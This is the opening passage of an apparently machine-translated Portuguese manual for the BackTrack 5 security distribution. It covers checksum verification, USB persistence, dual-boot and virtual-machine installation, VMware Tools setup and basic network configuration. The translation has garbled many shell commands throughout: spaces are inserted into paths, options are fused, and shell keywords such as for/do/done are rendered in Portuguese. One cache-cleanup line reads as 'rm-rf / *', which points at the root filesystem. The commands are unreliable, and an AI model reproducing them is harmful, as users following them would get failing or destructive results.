Você está na página 1de 188

Monsters

2012

Manual Completo BackTrack5

Verso: 15/05/2012
Traduzido utilizando http://translate.google.com.br
1
Texto extraido de http://www.backtrack-linux.org/wiki/index.php/Downloading

Manual Completo BackTrack 5


1. Introduo
a. Baixando o BackTrack
b. Instalando o BackTrack
i. Instala USB
1. Unetbootin USB Installer
2. Persistent Install USB
ii. Instala HardDrive
1. Dual Boot no Windows 7
2. Instala BackTrack no disco rigido
iii. Virtualizao
1. Instalando o BackTrack no VirtualBox
2. Instalando o VirtualBox dentro do BackTrack
3. Instalando VMWare Player no BackTrack
4. Instalando o VMWare Tools
c. Uso Basico
2. Kernel
a. Preparando os cabealhos do Kernel
b. Habilitar Kernel PAE
c. Habilitar B43 Drivers
3. Personalizao
a. Instalando Java
b. Configurando FluxBox
c. Instalando Flash Player
d. Instalando OpenCL
4. Coleta de Informaes
a. Autoscan
b. Unicornscan
5. Identificao de Vulnerabilidade
a. OpenVas
6. Explorao
a. Metasploit Framework MySQL
7. Anlise de Rede de Rdio
a. Drivers Wireless
b. Cozinhar com RFID Mifare Classic
8. Escalonamento de privilgios
a. CUDA no BackTrack 5
b. JTR Cluster
c. Pyrit Cluster
9. Telefonia
a. VOIP pentesting com BackTrack

10.

11.
12.

b. DECT Sniffing Dedected


Forensics
a. Bota Forensics
b. Instalando o AASI
c. Instalando GPGDir
Bugs conhecidos inversas
FAQ

Introduo

Baixando BackTrack
Com o lanamento do Backtrack 5, agora suportam 32 bits, 64 bits e
ARM. Backtrack 5 vem com dois gerenciadores de janelas principais: Gnome e
KDE. Voc pode escolher a pgina de download ou uma imagem VMWare ou
uma imagem ISO inicializvel (recomendado se voc executar Backtrack partir de
um LiveCD ou uma instalao de HDD / USB). Por favor use nossos servidores
oficiais para download BackTrack. Estes podem ser encontrados na pgina de
transferncia . No use um gerenciador de downloads com nossos links como
seu download ir provavelmente ser corrompidos.

Verificando o download em Linux


Depois de ter baixado BackTrack5 R2, voc deve verificar a validade do arquivo
baixado usando md5sum. Isso permitir que voc elimine o problema mais comum
encontrado pelos usurios inversas - mal baixado (corrupto) arquivos ISO. Para
verificar a soma MD5 de sua ISO baixado, use o comando md5sum:
root @ bt: ~ # md5sum BT5R2-KDE-32.iso
38ff62f14cecce5c842df60cbadbdb22 BT5R2-KDE-32.iso
root @ bt: ~ #

BackTrack 5 md5sums R2 ISO so resumidas aqui para sua convenincia.

BT5r2-KDE-64 KDE md5sum 64bit: 6d5996df868dfe9c31aad234187ad7d0

BT5r2-KDE-32 KDE 32bit md5sum: adb7eece8964aab083294f06aa44b625

BT5r2-GNOME-64 md5sum GNOME


64bit: 4864e7cacdc35a886ef8264eb346f414

BT5r2-GNOME GNOME-32 32bit


md5sum: 4ad5f359bad43bb934d59fcf6632ae1b

BT5R2-GNOME-VM-32 GNOME 32bit


md5sum: 9a8ec2fb4bbf4a5e626cfeb8970609fd

BT5R2-GNOME-VM-64 md5sum GNOME


64bit: dad2f4bf1045c56c0104218fa5d68aff

Verificando o download no Windows


1. Para verificar o md5sum do seu BackTrack ISO no Windows, voc pode
utilizar a ferramenta "HashCalc" de SlavaSoft HashCalc - Hash, CRC e
HMAC Calculadora
2. Uma vez baixado HashCalc, aberta, desmarque todas as caixas, exceto
md5 e formato de dados de alterao para "arquivo".
3. Na caixa de dados do lado direito existe um boto com 3 pontos, clique nele
e navegue at onde voc baixou o seu. Iso ou. Bz2 e selecion-lo, clique
em Abrir e, em seguida "calcular". Depois de alguns segundos (ou mais,
dependendo da sua velocidade de computador), haver uma seqncia de
32 bits ao lado do md5 palavra, este o md5 do seu arquivo.

Compare seu md5 para o hash md5 na pgina de download. Se eles so iguais,
ento o seu iso ou bz2 bom, se no o arquivo est corrompido e voc precisa
baix-lo novamente.

Verificando o download em OSX


Abra o console e use o comando md5 para calcular o seu BackTrack ISO md5:
revoluo: ~ mutS $ md5 BT5R2-GNOME-32.iso
MD5 (BT5R1-GNOME-32.iso) = 49f3dda1e617cb6f4045735766839690
revoluo: do ~ mutS $

Notas importantes
Os problemas mais comuns encontrados com BackTrack pelos recm-chegados
so os seguintes:
1. Descasamentos ISO md5sum, que resultam em questes aleatrias no
BackTrack.
2. Baixa qualidade da mdia (no caso de DVDs), ou gravar o arquivo ISO em
velocidades que so demasiado elevados.
3. Queima BackTrack em um DVD como um arquivo em vez de uma imagem
de disco.
Por favor, certifique-se de verificar tudo o que foi mencionado anterior antes de
iniciar uma discusso sobre o Frum.

Qual ser a prxima?


O BackTrack 5 imagem ISO inicializvel, o que significa que voc ter que quer
queimar a ISO em um DVD ou transferi-lo para um stick USB.Depois de ter feito
isso, ento voc vai ser capaz de inicializar o computador no ambiente ao vivo
BackTrack. A partir deste ambiente ao vivo voc pode continuar a usar o
BackTrack ou instal-lo em seu disco rgido usando um dos guias de instalao
listados na pgina de instalao .

Instalando o BackTrack
UNetbootin USB Installer
Ferramentas e Preparao

Thumbdrive USB (USB mnima capacidade Drive 4 GB)

Backtrack 5 arquivo ISO, md5sum verificada.

UNetbootin - Uma ferramenta para transferir uma imagem iso em um drive USB

UNetbootin permite criar discos de boot Live USB para Ubuntu, Fedora e outras
distribuies Linux sem queimar um CD. Ele roda em Windows e Linux. Voc pode
deixar UNetbootin baixar uma das muitas distribuies suportadas out-of-the-box
para voc, ou fornecer seu prprio Linux. Iso se voc j tiver baixado um ou a sua
distribuio preferida no est na lista. Este mtodo de obter uma instalao ao
vivo para uma unidade USB o mais simples Unetbootin disponvel usando. Note
que ir formatar o drive USB e apagar seu contedo.
Nota: agora voc pode salvar as alteraes feitas no sistema entre as
reinicializaes (persistncia).

Baixe a ltima BackTrack iso de nossa pgina de download do BackTrack .

Download UNetbootin , verso mais recente (Linux, Windows, OSX)

Conecte seu drive USB

Formatar o disco USB para FAT32

Iniciar Unetbootin e selecione a opo "DiskImage", escolha um BackTrack 5


arquivo ISO.

Selecione a quantidade de espao a ser usado para persistncia na MB

Selecione seu drive USB e clique em "OK" para criar um inicializvel BackTrack
drive USB.

Uma vez iniciada, lembre-se que o nome de usurio ea senha padro


so raiz / toor .

USB Persistente
Ferramentas e Preparao

USB Thumbdrive (mnimo 8GB)

Backtrack 5 arquivo ISO, md5sum verificados ou DVD inicializvel BT5

VMware para iniciar o iso, se voc optar por executar todos os passos a partir
de uma VM como eu fiz

No faz diferena qual voc escolher, basta estar ciente de que as designaes de
unidade pode ser diferente para voc do que eles eram para mim.
Isto pode no ser a melhor maneira de fazer isso, mas funciona. Estou certo de
que h uma maneira mais elegante de fazer isso que eu possa rever mais tarde,
se surgir a necessidade eo tempo permite.

Particionamento
Mostrar as unidades disponveis com o comando abaixo e determinar qual a
unidade que deseja instalar.
dmesg | egrep hd \ |. sd.

A unidade de destino precisa ser dividido da seguinte forma:

A primeira partio deve ser uma partio primria de no mais de 2,5 GB e


definidas com o tipo vfat (eu fiz esta partio maior do que o necessrio, de
modo que abrange todos do iso e verses futuras). Faa a partio ativa para
evitar problemas de inicializao.

A segunda partio que armazena as alteraes devem ocupar o resto do


espao no pendrive, ou tanto quanto voc deseja alocar para salvar as
alteraes (5GB em um mnimo absoluto).

Execute os seguintes comandos para executar o particionamento.


fdisk / dev / sdb

# Use a letra de unidade apropriada para o seu sistema </ pre> </ html>
Apagar todas as parties existentes

Command (m for help): d


Nmero da partio (1-4): 1

Criar a primeira partio

Command (m for help): n


Comando de ao
e prorrogado
p partio primria (1-4)
p
Nmero da partio (1-4): 1
First cylinder (1-522, default 1):
Usando valor padro 1
ltimo cilindro, cilindros de + ou + tamanho {K, M, G} (1-522, default
522): 2.500 M

Criar a segunda partio

Command (m for help): n


Comando de ao
e prorrogado
p partio primria (1-4)
p
Nmero da partio (1-4): 2
Primeiro cilindro (193-522, default 193):
Usando valor padro 193
ltimo cilindro, cilindros ou + de + {tamanho K, M, G} (193-522,
default 522):
Usando valor padro 522

Defina a primeira partio para vfat/fat32

Command (m for help): t


Nmero da partio (1-4): 1
cdigo hexadecimal (digite L para listar os cdigos): b
tipo de sistema Mudou de partio 1 para b (W95 FAT32)

Defina a segunda partio para Linux

Command (m for help): t


Nmero da partio (1-4): 2
cdigo Hex (tipo L para listar os cdigos): 83

Faa a primeira partio ativa

Command (m for help): um


nmero de partio (1-4): 1
Command (m for help): w

Neste ponto, voc pode precisar ejetar e reinserir a unidade para que as
alteraes da tabela de partio para ser reconhecido e para que voc seja capaz
de realizar o restante das etapas.

Formatar as parties
mkfs.vfat-F 32-n BT5 / dev/sdb1
mkfs.ext3-b 4096-L casper-rw / dev/sdb2

Por favor, note que a segunda partio deve ser rotulado como casperrw exatamente como est escrito aqui, no h outro rtulo ir funcionar, mesmo se
voc no usar bons vez.

Instale BackTrack ao Thumbdrive


Monta a primeira partio que sdb1 neste exemplo.
mkdir / mnt/sdb1
mount / dev/sdb1 / mnt/sdb1

Copie os arquivos da ISO para o drive USB


cd / mnt/sdb1

rsync-r / cdrom / *.

Esta ltima etapa vai levar um par de minutos para terminar, talvez mais,
dependendo da velocidade de seus discos e mtodo que voc est usando.

Faa a unidade inicializvel


Neste prximos passos, ns fazemos os arquivos Thumbdrive de arranque e cpia
em seu local apropriado com seus nomes corretos.
syslinux / dev/sdb1

Isso fez com que o disco de boot, mas como estamos usando arquivos de isolinux
com syslinux que ser nomeado incorretamente e estar nos locais errados. Ns
podemos facilmente corrigir isso com os seguintes comandos.
cp-r isolinux syslinux
cp syslinux / isolinux.cfg syslinux / syslinux.cfg
cp syslinux / isolinux.bin syslinux / syslinux.bin

Configurar Persistncia
Para configurar os modos persistentes nas entradas que queremos, precisamos
fazer o seguinte:
nano syslinux / syslinux.cfg

Nossos syslinux.cfg originais ser parecido com este:


padro vesamenu.c32
0 aviso
tempo limite 300
menu de ttulos BackTrack Live CD
splash.png fundo do menu
a cor do menu ttulo 1, 37, 44 # # 00000000 c0ffffff std
PADRO rtulo
menu de etiqueta Texto BackTrack - Padro Modo Texto de
inicializao
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd =
/ casper / initrd.gz respingo texto vga = 791 -

STEALTH rtulo
menu de etiqueta BackTrack Stealth - sem rede ativada
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd =
/ casper / initrds.gz texto inicial StaticIP vga = 791 FORENSICS rtulo
de menu Forensics rtulo de retorno - No Mount Drive ou Trocando
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd =
/ casper / initrdf.gz respingo texto vga = 791 NODRM rtulo
menu de etiqueta BackTrack noDRM - Sem Drivers DRM
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd =
/ casper / initrd.gz texto inicial nomodeset vga = 791 debug rtulo
menu de etiqueta BackTrack Debug - Modo de Segurana
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd =
text / casper / initrd.gz rtulo memtest
menu de etiqueta BackTrack Memtest - Run memtest
kernel / isolinux / memtest
acrescentar rtulo hd
menu de etiqueta de inicializao do disco rgido - iniciar o
primeiro disco rgido
LOCALBOOT 0x80
acrescentar -

No meu caso eu s queria acrescentar uma bota padro novo que exatamente o
mesmo que a entrada padro original, com a exceo de ser o meu novo modo
persistente.
Para fazer o mesmo voc deve fazer seu olhar syslinux.cfg como o seguinte:
padro vesamenu.c32
0 aviso
tempo limite 300
menu de ttulos BackTrack Live CD
splash.png fundo do menu
a cor do menu ttulo 1, 37, 44 # # 00000000 c0ffffff std

PADRO rtulo
menu de etiqueta Texto BackTrack persistente - Boot modo persistente
Texto
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd
persistente = / casper / initrd.gz respingo texto vga = 791 texto do rtulo
menu de etiqueta Texto BackTrack - Modo Texto de inicializao
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd =
/ casper / initrd.gz respingo texto vga = 791 STEALTH rtulo
menu de etiqueta BackTrack Stealth - sem rede ativada
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd =
/ casper / initrds.gz texto inicial StaticIP vga = 791 FORENSICS rtulo
de menu Forensics rtulo de retorno - No Mount Drive ou Trocando
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd =
/ casper / initrdf.gz respingo texto vga = 791 NODRM rtulo
menu de etiqueta BackTrack noDRM - Sem Drivers DRM
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd =
/ casper / initrd.gz texto inicial nomodeset vga = 791 debug rtulo
menu de etiqueta BackTrack Debug - Modo de Segurana
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd =
text / casper / initrd.gz rtulo memtest
menu de etiqueta BackTrack Memtest - Run memtest
kernel / isolinux / memtest
acrescentar rtulo hd
menu de etiqueta de inicializao do disco rgido - iniciar o
primeiro disco rgido
LOCALBOOT 0x80
acrescentar -

Agora precisamos testar nosso novo modo persistente.

Reinicie o seu sistema a partir de USB e selecione "Texto BackTrack persistente Boot modo persistente Texto" ou aguarde o tempo limite para carreg-lo como
padro. Para testar a persistncia, crie um arquivo em qualquer lugar no sistema,
mas uma nova pasta ou arquivo de texto na rea de trabalho uma diferena
muito fcil e visual para verificar.
Reinicie.
Se o seu arquivo est l depois de um reboot, voc foi bem sucedido.

Instalar no HardDrive
Dual Boot BackTrack e Windows7
NOTA : O seguinte mtodo de instalao o mais simples disponvel. Fizemos
isso no pressuposto de que voc tem uma instalao do Windows que est a
ocupar todo o espao no seu disco e voc gostaria de redimensionar e
reparticionar o disco, a fim de permitir uma instalao BackTrack ao lado de seu
Windows.
AVISO : BACK-UP a instalao do Windows PRIMEIRO!

Vamos percorrer o instalador passo a passo:

Ns selecionamos a nossa lngua, neste caso Ingls e, em seguida, clique


no Encaminhar boto.

Aqui ns selecionamos a localizao geogrfica (The Zone Regio e Time) e


clique em Avanar .

Escolha o seu layout de teclado. Vamos deix-lo o padro que EUA e clique
em Avanar .

Agora hora de particionar o disco, para uma rpida e bem sucedida de


instalao dual-boot, vamos escolher o Instale-os lado a lado, escolhendo
entre eles cada inicializao opo e bateu frente ..

Depois disso, deve confirmar as alteraes que sero feitas para o disco.

Nesta tela, somos capazes de verificar as nossas opes de instalao,


verific-los para se certificar que tudo est certo do que clique em "Avanar".

AVISO : Quando o instalador chega a 99% o processo pode levar algum tempo
para no se apavore, espere cerca de 10-15 minutos.

Bata o Restart Now boto e desfrutar Backtrack!

Quando o computador ir inicializar, voc ser dado uma escolha para


inicializar Backtrack ou Windows.

Aps a reinicializao, voc pode fazer login com o nome de usurio


padro raiz e senha toor . No se esquea de alterar esta senha de root
padro, emitindo o passwd comando.

Como voc pode ver a tela inicial desapareceu aps a reinicializao. Para
corrigi-lo basta executar correo respingos , ea tela de abertura aparecer na
prxima inicializao.

Instale BackTrack em disco


NOTA: recomendvel que voc tenha um mnimo de 10 GB de espao em
disco livre para instalar o Backtrack!

Inicie o Backtrack Ambiente Live.

No prompt do bash, tipo startx para entrar no GUI.

Clique duas vezes no Backtrack.sh Install na rea de trabalho

Vamos percorrer o instalador passo a passo:

Ns selecionamos a nossa lngua, neste caso Ingls e, em seguida, clique


no Encaminhar boto.

Aqui ns selecionamos a localizao geogrfica (The Zone Regio e Time) e


clique em Avanar .

Escolha o seu layout de teclado. Vamos deix-lo o padro que EUA e clique
em Avanar .

Agora hora de particionar o disco, para uma instalao completa do disco,


escolhemos a opo "Apagar e usar o disco inteiro" opo e clique
em Avanar .

Nesta tela, somos capazes de verificar as nossas opes de instalao,


verific-los para se certificar que tudo est certo do que clique em "Avanar".

AVISO : Quando o instalador chega a 99% o processo pode levar algum tempo
para no se apavore, espere cerca de 10-15 minutos.

Bata o Restart Now boto e desfrutar Backtrack!

Aps a reinicializao, voc pode fazer login com o nome de usurio


padro raiz e senha toor . No se esquea de alterar esta senha de root
padro, emitindo o passwd comando.

Como voc pode ver a tela inicial desapareceu aps a reinicializao. Para
corrigi-lo basta executar correo respingos , ea tela de abertura aparecer na
prxima inicializao.

Virtualizao
VirtualBox Instalar BT
Este artigo foi contribudo por Boris Sverdlik.

URL: http://www.jadedsecurity.com

Twitter: ! https://twitter.com/ # jadedsecurity /

Neste tutorial, vamos dar uma olhada em como instalar o BackTrack 5 no


VirtualBox.

Baixe a ltima verso do VirtualBox a partir da pgina oficial .

Faa o download do BackTrack 5 ISO da pgina oficial

Depois de instalar o VirtualBox, vamos lan-lo e tentar criar uma nova


mquina virtual:

Clique em Novo -> Continuar -> Avanar


Nome (Select 64Bits Ubuntu) -> Avanar
Select Ram (Atribuir pelo menos 30%) -> Avanar

Marque a opo "Boot Disk" Criar novo disco rgido


Continuar -> "Armazenamento dinamicamente expansvel" -> Escolha
Localizao - Tamanho> (mnimo de
Continuar -> Feito

A configurao do disco deve ser semelhante a este:

Clique em Configuraes (Vamos deixar defaults mosts no para tudo,


para este How-To)
Clique em um armazenamento com "Armazenamento IDE" Selecionado no
cone da unidade com o sinal de mais que
Escolha Adicionar CD / DVD Escolha o Disco Navegue at a ISO BT5
voc tinha baixado
Clique em Exibir e escolher pelo menos 64MB
Clique em Ok
Abra o Terminal e digite o seguinte
VBoxManage setextradata "Backtrack" "CustomVideoMode1" "1100x740x16"

Clique em Iniciar
Clique dentro da janela - Tab> -> Escolha "Texto Backtrack"

Uma vez que a seqncia de inicializao terminar voc j vai estar em um


shell de root.

" NOTA : Se voc escolheu o ambiente KDE no se esquea de emitir o


seguinte comando antes startx :
root @ bt: ~ # rm / root/.kde/cache- *

Uma vez Backtrack Lana Duplo Clique no boto "Install Backtrack Icon" e siga
os passos a partir de aqui .

Aps as configuraes de terminar, desligue o Backtrack.

Clique em Configuraes na Virtual Gestor uma caixa de armazenamento


clique em "Armazenamento IDE" selecionado remover a distribuio LiveISO
Clique em Iniciar para iniciar o Backtrack

Agora vamos baixar o Addon Guest Vbox usando wget.

root @ bt: ~ # wget


http://download.virtualbox.org/virtualbox/4.0.8/VBoxGuestAdditions_4.0
.8.iso

Agora execute os seguintes comandos:

root
root
root
root

@
@
@
@

bt:
bt:
bt:
bt:

~
~
~
~

#
#
#
#

mount-o loop VBoxGuestAdditions_4.0.8.iso / a


cd / a
chmod a + x VBoxLinuxAdditions.run
/ VBoxLinuxAdditions.run.

Reinicie o computador e divirta-se!

Instalando o VirtualBox em BackTrack5

Baixe a verso para o Ubuntu 10.04 a partir do site oficial

root @ bt: ~ #

Tente instalar o. Pacote deb

root @ bt: ~ # dpkg-i virtualbox-4.0_4.0.10-72479 ~ ~ Ubuntu


lucid_i386.deb

Voc dever receber um erro semelhante a este:

root @ bt: ~ # dpkg-i virtualbox-4.0_4.0.10-72479 ~ ~ Ubuntu


lucid_i386.deb
Selecionando pacote previamente no selecionado virtualbox-4.0.
(Lendo banco de dados ... 219334 arquivos e diretrios atualmente
instalados.)
Desempacotando virtualbox-4.0 (de virtualbox-4.0_4.0.10-72479 ~ ~
lucid_i386.deb Ubuntu) ...
dpkg: problemas de dependncia impedem configurao de virtualbox-4.0:
virtualbox-4.0 depende de libqt4-opengl (> = 4:4.5.3), no entanto:
Pacote libqt4-opengl no est instalado.
dpkg: erro processando virtualbox-4.0 (- install):
problemas de dependncia - deixando desconfigurado
Processando gatilhos para ureadahead ...
Processando gatilhos para shared-mime-info ...
Processando gatilhos para desktop-file-utils ...
Processando gatilhos para python-gmenu ...
Reconstruo / usr/share/applications/desktop.en_US.utf8.cache ...
Processando gatilhos para hicolor-icon-theme ...
Processando gatilhos para python-support ...
Erros foram encontrados durante processamento de:
virtualbox-4.0
root @ bt: ~ #

Como podemos ver que esto faltando algumas dependncias, vamos resolvlos rapidamente:

root @ bt: ~ # apt-get-f-y autoremove


root @ bt: ~ # apt-get install libqt4-opengl libqt4-opengl-dev
root @ bt: ~ # dpkg-i virtualbox-4.0_4.0.10-72479 ~ Ubuntu ~
lucid_i386.deb

Aps a instalao estiver concluda, voc deve ser capaz de iniciar o VirtualBox
do menu Aplicaes -> Ferramentas do Sistema -> Oracle VM VirtualBox

Divirta-se!

Instalando o VMware no BackTrack5 R2


NOTA: Os mesmos passos cobrir a instalao do VMware Workstation e
VMware Player tambm!

Primeiro, precisamos ir para o site oficial e baixar o VMware Workstation /


Player.

Ns CHMOD do arquivo, a fim de torn-lo executvel de iniciar o instalador:

root @ bt: ~ / Desktop # chmod + x

Agora ns deve ser apresentado com a tela de instalao, se voc encontrar


quaisquer problemas no lanamento do instalador verificar que voc tenha
baixado o pacote correto sobre arquitetura e MD5sum.

A partir daqui, podemos ir com as opes padro selecionadas pelo


instalador. No mude nada a no ser que voc saiba o que est fazendo!

Quando a instalao estiver concluda, quando tentamos executar VMware


devemos receber um erro.

Dando uma olhada no arquivo de log que devemos ver na ltima linha que o
mdulo vmnet no pode ser carregado.

root @ bt: ~ / Desktop # tail / tmp/vmware-root/modconfig-12072.log


2012-02-28T23: 52:42.262 +02:00 | vthread-3 | I120: Falha ao compilar
vmnet mdulo!

Cancelar o lanador VMware.

Agora precisamos baixar o patch de vmnet extrair e execut-lo.

xvfz vmware802fixlinux320.tar.gz
root @ bt: ~ # chmod + x-patch modules_3.2.0.sh
root @ bt: ~ # ./patch-modules_3.2.0.sh

Se o patch foi aplicado com sucesso, voc deve ver algo semelhante ao
seguinte.

Aps a correo est finalizada, podemos executar o nosso produto VMware.

Agora voc pode se divertir usando o produto VMware!

Instalando o VMware Tools no BackTrack


NOTA : Nossa GNOME imagem VMware do BackTrack tem o VMware Tools
instalado por padro.

Backtrack 5 R2
NOTA : Os usurios do KDE, por favor, execute o seguinte comando antes de
instalar ferramentas VMWare no BackTrack R2 5:
root @ bt: ~ # mkdir / etc / cups / ppd

Pelo amor de google, aqui o erro que voc recebe se voc no criar esse
diretrio, em um KDE BT5R2 instalar:
No foi possvel criar link simblico "/ etc / cups / ppd /
VMware_Virtual_Printer.ppd", apontando para o arquivo "/ usr / lib /
vmware-tools / configurador / thinprint.ppd".

Em um recm-instalado ou atualizado BackTrack 5 R2:

root @ bt: ~ # preparar-kernel-sources

Avanar no VMware Player, clicamos Virtual Machine -> Ferramentas


instalar o VMware .

Agora vamos configurar rapidamente as VMware Tools, emitindo os seguintes


comandos:

root
root
root
root
root
root

@
@
@
@
@
@

bt:
bt:
bt:
bt:
bt:
bt:

~
~
~
~
~
~

#
#
#
#
#
#

mkdir / mnt / cdrom; mount / dev / cdrom / mnt / cdrom


. cp / mnt/cdrom/VMwareTools- <verso> tar.gz / tmp /
cd / tmp /
. tar zxpf VMwareTools <version> tar.gz
cd vmware-tools-distrib /
/ vmware-install.pl.

NOTA : Aps esta srie de perguntas viro, se no tiver certeza sobre eles apenas
deix-los padro. No momento desta postagem, as ferramentas VMWare no
compilam de forma limpa com o kernel 3.2.6. Em particular, o condutor vmxnet
falhar para compilar. No entanto, o BackTrack 3.2.6 kernel j tem um driver vmxnet
nativo, ento no deve haver perda global de desempenho.

Backtrack 5 R1

Em caso de necessidade de instalar manualmente as VMware Tools voc


primeiro tem que preparar a sua fonte do kernel, emitindo os seguintes
comandos:

root @ bt: ~ # ln-s / usr / src / linux / lib/modules/2.6.39.4/build

Avanar no VMware Player, clicamos Virtual Machine -> Ferramentas


instalar o VMware .

Agora vamos configurar rapidamente as VMware Tools, emitindo os seguintes


comandos:

root
root
root
root
root
root

@
@
@
@
@
@

bt:
bt:
bt:
bt:
bt:
bt:

~
~
~
~
~
~

#
#
#
#
#
#

mkdir / mnt / cdrom; mount / dev / cdrom / mnt / cdrom


. cp / mnt/cdrom/VMwareTools- <verso> tar.gz / tmp /
cd / tmp /
. tar zxpf VMwareTools <version> tar.gz
cd vmware-tools-distrib /
/ vmware-install.pl.

NOTA : aps esta srie de perguntas viro, se no tiver certeza sobre eles apenas
deix-los padro Quando perguntado se voc quiser que o script RUN VMWAREconfig-TOOLS.PL PARA VOC, DIGA NO!

Precisamos agora aplicar alguns patches para as fontes do mdulo do kernel


VMWare antes de serem construdos. Assim:

Antes de executar o VMware Tools pela primeira vez, voc precisar


configur-lo por
invocando o seguinte comando: "/ usr / bin / vmware-config-tools.pl".
Voc quer
este programa para invocar o comando para voc agora? [Sim] no

Agora vamos aplicar o vmware-tools 2.6.39 patch:

root @ bt: ~ # cd / usr / lib / vmware-tools / modules / source /


root @ bt: ~ # . para arquivo no * tar; fazer tar xpf $ arquivo; feito
root @ bt: ~ # tar rm *.
root @ bt: ~ # wget www.backtrack-linux.org/vmtools2639.patch
root @ bt: ~ # patch-p1 <vmtools2639.patch
root @ bt: ~ # para dir in $ (ls-l | grep apenas | awk -F "" '{print $
8}' | cut-d "-"-f1); fazer tar cvf $ dir.tar $ dir-only; rm-rf $ dironly; feito
root @ bt: ~ # vmware- config-tools.pl

Se estiver executando no Mac Fusion, o patch no ser aplicado de forma


limpa. Aceite os padres e continuar.

Continue com a instalao at o fim, e esperamos que todos os mdulos do


VMWare dever compilar!

trazer de volta seu console bonito e iniciar o sistema:

root @ bt: ~ # correo splashroot @ bt: ~ # shutdown-r 0

Backtrack 5

Em caso de necessidade de instalar manualmente as VMware Tools voc


primeiro tem que preparar a sua fonte do kernel, emitindo os seguintes
comandos:

root @ bt: ~ # preparar-kernel-fontes


root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / gerado / * include / linux /

Avanar no VMware Player, clicamos Virtual Machine -> Ferramentas


instalar o VMware , ir montar um CD contendo um arquivo.

Agora vamos configurar rapidamente as VMware Tools, emitindo os seguintes


comandos:

root @ bt: ~ # cp-f / media / VMware Tools/VMwareTools-8.4.6385536.tar.gz \ root / /


root @ bt: ~ # tar xvfz VMwareTools-8.4.6 385536.tar.gzraiz @ bt: ~ # cd vmware-tools-distrib /
root @ bt: ~ / vmware-tools-distrib # . / vmware-install.pl

NOTA : Aps esta srie de perguntas viro, se no tiver certeza sobre eles apenas
deix-los padro.
Em qual diretrio voc deseja instalar os arquivos binrios?
[/ Usr / bin] [RETORNO]
............
............
A configurao do VMware Tools 8.4.6 build-385536 para Linux para essa
execuo
do kernel concluda com xito.
Voc deve reiniciar a sesso X antes de qualquer mouse ou alteraes
grficas tomar
efeito.
Agora voc pode executar o VMware Tools, invocando "/ usr / bin /
vmware-toolbox-cmd" do
de linha de comando ou invocando "/ usr / bin / vmware-toolbox" na
linha de comando
durante uma sesso de servidor X.
Para ativar recursos avanados X (por exemplo, convidado resoluo
ajuste, arrastar e soltar, e
arquivo de texto e copiar / colar), voc vai precisar fazer um (ou
mais) dos seguintes:
1. Iniciar manualmente / usr / bin / vmware-user
2. Sair e voltar a entrar na sua sesso de desktop, e,
3. Reinicie sua sesso X.
Para usar o driver vmxnet, reinicie rede usando os seguintes comandos:
/ Etc / init.d / networking parada
rmmod pcnet32
rmmod vmxnet

modprobe vmxnet
/ etc / init.d / networking start
Aproveite,
- A equipe do VMware
Encontrado VMware Tools CDROM montado em / media / VMware Tools.
Dispositivo de ejeco
/ Dev/sr0 ...

Se voc ver a mensagem acima no terminal que significa que a instalao foi
bem sucedida, agora, depois de uma reinicializao rpida as VMware Tools
deveria estar trabalhando, tambm no vamos esquecer de corrigir a tela
Splash.

root @ bt: ~ # correo splashroot @ bt: ~ # shutdown-r 0

Uso Bsico
Iniciar sesso no BackTrack
Uma vez que a instalao do BackTrack feito, o nome de usurio padro ea
senha necessrios para efetuar login so raiz / toor .
NOTA : Voc no ser capaz de ver a senha enquanto voc digita.

Iniciando um ambiente GUI


Depois que voc est logado, voc pode iniciar o ambiente grfico, emitindo
o startx comando.

X vai comear!
Em raras ocasies (como aps um VMware ferramentas de instalao, ou quando
se utilizam placas de vdeo no suportado), X se recusa a iniciar.Se isso acontecer
voc tem vrias opes que voc pode tentar a fim de corrigir o problema:

Reconfigurar o pacote do servidor X, voc pode redefinir (e muitas vezes


corrigir) as configuraes do Xorg com o seguinte comando:
root @ bt: ~ # dpkg-reconfigure xserver-xorg

Se voc estiver usando Backtrack 5 em x64 com o KDE, voc deve tentar o
seguinte:
root @ bt: ~ # rm / root/.kde/cache- *

NOTA : s vezes voc pode precisar tambm de remover as pastas de cache em /


var / tmp, emitindo o seguinte comando:
root @ bt: ~ # rm-rf / * var/tmp/kdecache-

Comear a trabalhar em rede


Se voc no tenha notado ainda BackTrack no arrancar com a rede por padro, a
fim de aumentar a sua invisibilidade.

Configurar o IP manualmente
Vamos primeiro configurar a rede manualmente. No exemplo a seguir vamos
assumir os seguintes endereos e sua finalidade:

Endereo IP
Gateway Padro servidor DNS

192.168.1.112/24
192.168.1.1
192.168.1.1

Para configur-los, vamos executar os seguintes comandos:


root @ bt: ~ # ifconfig eth0 192.168.1.112/24
root @ bt: ~ # route add default gw 192.168.1.1
root @ bt: ~ # echo nameserver 192.168.1.1> / etc / resolv.conf

Obtendo um endereo IP esttico para ficar entre


reinicializaes
Essas configuraes no entanto s vai durar at que voc reiniciar, por isso, se
queremos salvar-los entre reboots, precisamos editar o / etc / network /
interfaces arquivo como este:
# Este arquivo descreve as interfaces de rede disponveis em seu
sistema
# E como ativ-los. Para mais informaes, consulte Interfaces (5).
# A interface de rede loopback
auto lo
iface lo inet loopback
# A interface de rede primria
auto eth0
iface eth0 inet static
endereo 192.168.1.112
netmask 255.255.255.0
rede 192.168.1.0
transmitir 192.168.1.255
gateway de 192.168.1.1

Edite o arquivo conforme o caso, ento, a rede de aparecer automaticamente no


momento da inicializao:
root @ bt: ~ # update-rc.d networking defaults
root @ bt: ~ # / etc / init.d / networking restart

Obtendo um IP do DHCP
A fim de obter um endereo IP de um servidor DHCP que pode emitir o dhclient
<interface> comando da seguinte forma:

root @ bt: ~ # dhclient eth0


Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
Todos os direitos reservados.
